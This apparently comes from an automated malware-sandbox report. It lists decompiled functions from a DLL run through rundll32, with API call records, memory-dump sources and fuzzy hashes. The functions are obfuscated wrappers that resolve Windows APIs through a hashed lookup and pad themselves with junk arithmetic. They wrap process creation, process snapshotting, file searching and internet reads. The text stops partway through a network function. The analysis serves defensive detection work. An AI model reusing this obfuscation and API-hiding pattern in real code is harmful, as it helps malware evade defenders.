API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 2bb1c9934d6c3932909ad8a5b55577d84cd9038c76cdce90d1a992430b05ddd5
Instruction ID: 4af193c3480e2ca2be622277242bb03d5c726e893fbcb0e4d26ee7e20b907797
Opcode Fuzzy Hash: 2bb1c9934d6c3932909ad8a5b55577d84cd9038c76cdce90d1a992430b05ddd5
Instruction Fuzzy Hash: CDF0F6735022156FEB509B64FD88F49B7A9FBD835AFC70226F14C83011CF74A980C661

Uniqueness

Uniqueness Score: -1.00%

Function 10028706, Relevance: 5.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028706(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x10094594
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x1002870d
0x10028710
0x10028710
0x10028714
0x1002871a
0x1002871f
0x10028748
0x10028749
0x00000000
0x1002874f
0x10028721
0x10028724
0x00000000
0x00000000
0x10028728
0x10028730
0x00000000
0x10028737
0x1002873e
0x00000000
0x10028744

APIs

EnterCriticalSection.KERNEL32(10094594,00000000,?,?,?,10028C0A,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10028714
TlsGetValue.KERNEL32(10094578,?,?,?,10028C0A,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10028728
LeaveCriticalSection.KERNEL32(10094594,?,?,?,10028C0A,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 1002873E
LeaveCriticalSection.KERNEL32(10094594,?,?,?,10028C0A,?,00000004,1001F117,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10028749

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: f446485eae0a5b85bb0be7b1e59568eeec0e5eb3aa075abc540a129f137b1da5
Instruction ID: 53ffce2adbf54e8034acad2ba2ca5547ab15491612ecf4f42e1a12bd56cc3345
Opcode Fuzzy Hash: f446485eae0a5b85bb0be7b1e59568eeec0e5eb3aa075abc540a129f137b1da5
Instruction Fuzzy Hash: A6F05E3A2056589FD3218F54ECC8C0AB7FEEBC83A17664526F80993122D631F9418BA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4596 Parent PID: 1440 rundll32.exeCOMMON

Executed Functions

Function 011431D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E011431D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E01142523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E01122309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x011431da
0x011431df
0x011431e1
0x011431e4
0x011431e7
0x011431e8
0x011431e9
0x011431ec
0x011431ef
0x011431f2
0x011431f3
0x011431f4
0x011431f7
0x011431fa
0x011431fd
0x011431fe
0x01143200
0x01143205
0x0114320f
0x01143214
0x0114321b
0x0114321f
0x01143223
0x0114322a
0x01143231
0x01143235
0x01143241
0x01143249
0x0114324c
0x01143253
0x0114325a
0x0114325e
0x01143265
0x0114326c
0x01143273
0x0114327a
0x01143281
0x011432a1
0x011432bb
0x011432c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 011432BB

Memory Dump Source

Source File: 00000003.00000002.671518283.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true

Associated: 00000003.00000002.671514239.0000000001120000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.671539765.0000000001145000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.671543951.0000000001147000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: 4be69034c796d3bf6e7bd0256f199a3ba64bc7ee135a0c41f5838694e990509d
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 50310572801249BBCF65DF96CD09CDFBFB5FB99704F108188F91466220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01124248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01124248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E01122309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x0112424e
0x01124254
0x0112425b
0x01124262
0x01124269
0x01124272
0x01124277
0x0112427c
0x01124283
0x0112428a
0x01124291
0x01124298
0x011242a2
0x011242aa
0x011242ad
0x011242b1
0x011242b5
0x011242bc
0x011242c3
0x011242c7
0x011242e7
0x011242f1

APIs

ExitProcess.KERNEL32(00000000), ref: 011242F1

Memory Dump Source

Source File: 00000003.00000002.671518283.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true

Associated: 00000003.00000002.671514239.0000000001120000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.671539765.0000000001145000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.671543951.0000000001147000.00000002.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: ae116fcd396d0f5907c545de550c4a89bc2587a6382bc181bab61df66a8f0353
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: C11128B5E00208EBDB48DFE5D94AADEBBF1FB54308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 011317CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E011317CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E01142523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E01122309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x011317d2
0x011317d5
0x011317d7
0x011317db
0x011317dc
0x011317e1
0x011317e8
0x011317f1
0x011317f8
0x011317ff
0x01131803
0x01131807
0x0113180e
0x0113181b
0x01131822
0x01131825
0x0113182c
0x01131833
0x01131844
0x01131847
0x01131859
0x0113185c
0x01131863
0x0113186a
0x0113186e
0x01131881
0x0113188d
0x01131893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0113188D

Memory Dump Source

Source File: 00000003.00000002.671518283.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true

Associated: 00000003.00000002.671514239.0000000001120000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.671539765.0000000001145000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.671543951.0000000001147000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 61243e035351ce5463a517c1c4765cd84dcab80b0d7acf89d6b4ec0884c64731
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: F32124B5D0020DFFDB08DFA4D94A9EEBBB4EB44304F208189E425B7240E3B56B149FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6596 Parent PID: 1368 rundll32.exeCOMMON

Executed Functions

Function 048231D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E048231D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E04822523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E04802309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x048231da
0x048231df
0x048231e1
0x048231e4
0x048231e7
0x048231e8
0x048231e9
0x048231ec
0x048231ef
0x048231f2
0x048231f3
0x048231f4
0x048231f7
0x048231fa
0x048231fd
0x048231fe
0x04823200
0x04823205
0x0482320f
0x04823214
0x0482321b
0x0482321f
0x04823223
0x0482322a
0x04823231
0x04823235
0x04823241
0x04823249
0x0482324c
0x04823253
0x0482325a
0x0482325e
0x04823265
0x0482326c
0x04823273
0x0482327a
0x04823281
0x048232a1
0x048232bb
0x048232c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 048232BB

Memory Dump Source

Source File: 00000006.00000002.675975018.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000006.00000002.675949523.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.676031918.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.676046126.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: 9bd5f65f6828d0467abd965bf3134ea07a9fc0e31b1949dd9f49d9a78cddf261
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 55311472801249BBCF65DF96CD49CDFBFB5FB89704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04804248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04804248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E04802309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x0480424e
0x04804254
0x0480425b
0x04804262
0x04804269
0x04804272
0x04804277
0x0480427c
0x04804283
0x0480428a
0x04804291
0x04804298
0x048042a2
0x048042aa
0x048042ad
0x048042b1
0x048042b5
0x048042bc
0x048042c3
0x048042c7
0x048042e7
0x048042f1

APIs

ExitProcess.KERNEL32(00000000), ref: 048042F1

Memory Dump Source

Source File: 00000006.00000002.675975018.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000006.00000002.675949523.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.676031918.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.676046126.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: abcc6e245aed07bc4e3ca25b50f6c99675a77ef203a1267c5635a801f2ca9d6d
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 5F1128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208189E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 048117CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E048117CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E04822523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E04802309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x048117d2
0x048117d5
0x048117d7
0x048117db
0x048117dc
0x048117e1
0x048117e8
0x048117f1
0x048117f8
0x048117ff
0x04811803
0x04811807
0x0481180e
0x0481181b
0x04811822
0x04811825
0x0481182c
0x04811833
0x04811844
0x04811847
0x04811859
0x0481185c
0x04811863
0x0481186a
0x0481186e
0x04811881
0x0481188d
0x04811893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0481188D

Memory Dump Source

Source File: 00000006.00000002.675975018.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000006.00000002.675949523.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.676031918.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.676046126.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 72c60534e6094683c5792b3000ef5ec03544eef77b0a9a61bc9febf1d4d51667
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 232115B5D0020DFBDB04DFA8C94A9EEBBB4EB44304F108189E425A7250E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 404 Parent PID: 6596 rundll32.exeCOMMON

Executed Functions

Function 04811A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E04811A80(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t44;
				void* _t55;
				signed int _t57;
				struct _WIN32_FIND_DATAW* _t63;

				_push(_a16);
				_t63 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E04822523(_t44);
				_v36 = 0x40784c;
				asm("stosd");
				asm("stosd");
				_t57 = 0x66;
				asm("stosd");
				_v8 = 0xc58147;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xffff0e61;
				_v8 = _v8 ^ 0xffff2899;
				_v16 = 0x3eee0f;
				_v16 = _v16 ^ 0xf4098113;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x918df00d;
				_v12 = 0x61adbd;
				_v12 = _v12 | 0x1ce5c3f2;
				_v12 = _v12 ^ 0x5ce6c57a;
				_v12 = _v12 ^ 0x400dc737;
				_v20 = 0x919b51;
				_v20 = _v20 + 0x9c69;
				_v20 = _v20 ^ 0x00927a19;
				E04802309(0x352, _t57, _t57, 0x810611c3, _t57, 0x9c9047d0);
				_t55 = FindFirstFileW(_a16, _t63); // executed
				return _t55;
			}

0x04811a88
0x04811a8b
0x04811a8d
0x04811a90
0x04811a93
0x04811a96
0x04811a98
0x04811a9d
0x04811aac
0x04811ab1
0x04811ab2
0x04811ab9
0x04811aba
0x04811acb
0x04811ace
0x04811ad2
0x04811ad9
0x04811ae0
0x04811ae7
0x04811af9
0x04811afc
0x04811b03
0x04811b0a
0x04811b11
0x04811b18
0x04811b1f
0x04811b26
0x04811b2d
0x04811b40
0x04811b4c
0x04811b53

APIs

FindFirstFileW.KERNEL32(0480CC4B,?,?,?,?,?,?,?,?,?,?,09AB8BF6,00000072), ref: 04811B4C

Strings

Lx@, xrefs: 04811A9D

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: FileFindFirst
String ID: Lx@
API String ID: 1974802433-402333656
Opcode ID: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction ID: deda59535821a39e50beb76a31e3620dd80ef4b6ea7c9a2076de208d32c75954
Opcode Fuzzy Hash: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction Fuzzy Hash: 0E214375D00219EBEB18CFA9DC4A9DEBFB4FB84304F008589E811A6260D3B59B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04821027, Relevance: 1.6, APIs: 1, Instructions: 57
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E04821027(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, DWORD* _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				int _t55;
				signed int _t57;
				void* _t62;

				_push(_a24);
				_t62 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04822523(_t46);
				_v12 = 0xd4e775;
				_v12 = _v12 ^ 0x9fa1d679;
				_v12 = _v12 + 0xffffd43b;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x000b9d33;
				_v20 = 0xb1fd06;
				_v20 = _v20 + 0xffff1766;
				_v20 = _v20 ^ 0x00bd550d;
				_v16 = 0x2d7499;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x749af706;
				_v8 = 0x5dfa4b;
				_t57 = 0x11;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 | 0xef9b7d02;
				_v8 = _v8 ^ 0xef9457ed;
				E04802309(0x254, _t57, _t57, 0xf677e454, _t57, 0xc0cf1a4);
				_t55 = InternetReadFile(_t62, _a8, _a12, _a24); // executed
				return _t55;
			}

0x0482102e
0x04821031
0x04821033
0x04821036
0x04821039
0x0482103c
0x0482103f
0x04821043
0x04821044
0x04821049
0x04821053
0x0482105c
0x04821063
0x04821067
0x0482106e
0x04821075
0x0482107c
0x04821083
0x0482108a
0x0482108e
0x04821095
0x048210a1
0x048210a9
0x048210ac
0x048210b0
0x048210b7
0x048210d7
0x048210e9
0x048210ef

APIs

InternetReadFile.WININET(?,749AF706,00BD550D,?), ref: 048210E9

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction ID: 9d0b44f831a3a287def19e6dcbdf5ba437b2f50828677195b8ada1bbb964825c
Opcode Fuzzy Hash: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction Fuzzy Hash: 35211576D00209BBDF05DFE8C94A8DEBBB1EF44304F108189F92566251E3B55B61EB91

Uniqueness

Uniqueness Score: -1.00%

Function 04811B54, Relevance: 1.5, APIs: 1, Instructions: 47
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04811B54(int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t51;
				signed int _t52;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x604094;
				_v32 = 0x94e455;
				_v28 = 0xad6ab3;
				_v8 = 0x1f2344;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 0xe;
				_t52 = 0x3c;
				_v8 = _v8 * 0x16;
				_v8 = _v8 ^ 0x0ab2d5aa;
				_v20 = 0xb8d8f1;
				_v20 = _v20 ^ 0x9bb5e2ea;
				_v20 = _v20 ^ 0x9b0a37ea;
				_v16 = 0x527695;
				_v16 = _v16 << 1;
				_v16 = _v16 / _t52;
				_v16 = _v16 ^ 0x000d80fe;
				_v12 = 0xedaf67;
				_v12 = _v12 ^ 0xb485e6d8;
				_v12 = _v12 + 0xffff9be0;
				_v12 = _v12 ^ 0xb46ea43d;
				E04802309(0x190, _t52, _t52, 0xbde7009f, _t52, 0x9c9047d0);
				_t51 = CreateToolhelp32Snapshot(_a4, 0); // executed
				return _t51;
			}

0x04811b5a
0x04811b60
0x04811b67
0x04811b6e
0x04811b75
0x04811b7c
0x04811b80
0x04811b8a
0x04811b91
0x04811b94
0x04811b9b
0x04811ba2
0x04811ba9
0x04811bb0
0x04811bb7
0x04811bc4
0x04811bc7
0x04811bce
0x04811bd5
0x04811bdc
0x04811be3
0x04811bfd
0x04811c0a
0x04811c0f

APIs

CreateToolhelp32Snapshot.KERNEL32(B46EA43D,00000000), ref: 04811C0A

Memory Dump Source

Source File: 00000008.00000002.1189352214.0000000004801000.00000020.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 00000008.00000002.1189345400.0000000004800000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189386614.0000000004825000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.1189394029.0000000004827000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction ID: 47e1cc2ea36ed00605f32429b9f9f9e46e773af8c562f54f5dcae06e04fd375c
Opcode Fuzzy Hash: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction Fuzzy Hash: 6411F3B1D0520CEBDB58DFA8C94A6AEBBB0FF44304F108199E521B72A0D7B56B04DF51

Uniqueness

Uniqueness Score: -1.00%

Function 048054DA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E048054DA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
